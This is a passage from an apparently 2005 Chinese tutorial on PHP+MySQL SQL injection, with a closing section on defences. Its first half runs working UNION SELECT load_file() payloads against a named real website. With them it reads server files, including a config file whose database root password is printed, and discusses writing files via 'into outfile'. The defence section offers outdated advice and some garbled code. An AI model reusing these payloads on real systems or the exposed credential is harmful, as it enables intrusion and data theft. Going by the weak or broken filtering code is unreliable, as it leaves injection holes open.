httpwww.heibai.netdownshow.phpid=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,108,111,103,105,110,46,112,104,112)),13,14,15,16,17,18,19 
结果如图43: 

其中 
require (.includeglobal.php);  
require (.includeconfig.inc.php);  
require (.mainfunction.php);  
require (.function.php); 
当然了,我们去看config.inc.php吧 
dwebheibaiviparticleincludeconfig.inc.php 
转成char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112) 
输入 
httpwww.heibai.netdownshow.phpid=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)),13,14,15,16,17,18,19 
结果如图44 

显示了很多好东西哦 

$dbhost = localhost;  数据库主机名  
$dbuser = root;  数据库用户名  
$dbpass = 234ytr8ut;  数据库密码  
$dbname = article;  数据库名 
$ymcms_user_table = user;  
$ymcms_usergroup_table = usergroup;  
$ymcms_userrace_table = userrace;  
表还是默认的表,而且出来了root的密码 
要是能连上它的mysql该多好啊,那样我们就可以into outfile了 
痛苦的找了找phpmyadmin,没有找见,或许根本就没有用。 
读cwinntphp.ini发现 
; Magic quotes  
;  
; Magic quotes for incoming GETPOSTCookie data.  
magic_quotes_gpc = On 
55555555,痛苦中,我们看看能不能搞几个会员账号 
猜测会员账号放在user表中,我们直接读data下article文件夹里的user.myd文件 
Articleuser.myd转换成 
char(97,114,116,105,99,108,101,47,117,115,101,114,46,109,121,100) 
我们输入 
httpwww.heibai.netdownshow.phpid=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(97,114,116,105,99,108,101,47,117,115,101,114,46,109,121,100)),13,14,15,16,17,18,19 
结果如图45: 

晕了,竟然没有返回。我们来读Articleuser.frm 
httpwww.heibai.netdownshow.phpid=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(97,114,116,105,99,108,101,47,117,115,101,114,46,102,114,109)),13,14,15,16,17,18,19 
结果如图46 

晕了,表结构都在,而且读Articleuser.myi时也成功,可是为什么Articleuser.myd读不出来呢要是magic_quotes_gpc=Off我们还可以into outfile来看看,可是…… 
郁闷中,测试就这样结束吧,下面的工作还是留给你们来完成吧! 
文中所述问题已经通知星坤了! 
四:php+mysql注入的防范方法。 
在上一期的专题里已经讲了很多的防范方法,这里我就主要讲一下php+mysql注射攻击的防范方法。 
大家看到,在magic_quotes_gpc=On的时候,很多的注射攻击已经没有作用了。 
我们可以利用这个来加固我们的程序。Addslashes()函数等同于magic_quotes_gpc=On,而且与magic_quotes_gpc=On也不冲突,我们可以这样过滤 
$username = addslashes($username); 
$query=SELECT  FROM users WHERE userid='$username'); 
对于id型我们可以利用intval()函数,intval()函数可以将变量转换成整数类型,这样就可以了。 
我们可以这样 
$id = intval($id); 
$query=SELECT  FROM alphadb WHERE articleid='$id');  
如果是字符型的呢? 
我们可以先用addslashes()过滤一下,然后再过滤”%”和”_”. 
例如: 
$search = addslashes($search); 
$search = str_replace(_,_,$search); 
$search = str_replace(%,%,$search); 
记得,可千万别在magic_quotes_gpc=On的情况下替换为,如下: 
$password=str_replace(,,$password); 
我记得在darkness的文章《对某PHP站点的一次渗透》中提到过这个问题(在光盘中有收录)。 
还有的就是登陆的地方,如果是只用一个管理员管理的话,我们可以直接对username和passwd用md5加密,这样就不用害怕注入技术的发展了。 
Username=md5($HTTP_POST_VARS[username]); 
Passwd=md5($HTTP_POST_VARS[passwd]); 
我的后台登陆就是这样子的哦。 
后记: 
本文就讲这么多了,注入是一门灵活的技术,有很多技术还在继续发展中,有任何问题和意见可以到炎黄兵团(www.cnwill.comwww.securityfaq.org)来找我,也欢迎对文中内容批评指正。为便于大家学习本文所用到的文章系统也将随光盘附送。 
后后记: 
此文还是一年前所作,时至今日,很多的新的技术都已经涌现出来,具体的内容请参阅安全天使httpwww.4ngel.net网站,关于本文的任何问题您可以到httpwww.securityfaq.org提出。 
                                                    -------Alpha------- 
                                                            20050309

抱歉!评论已关闭.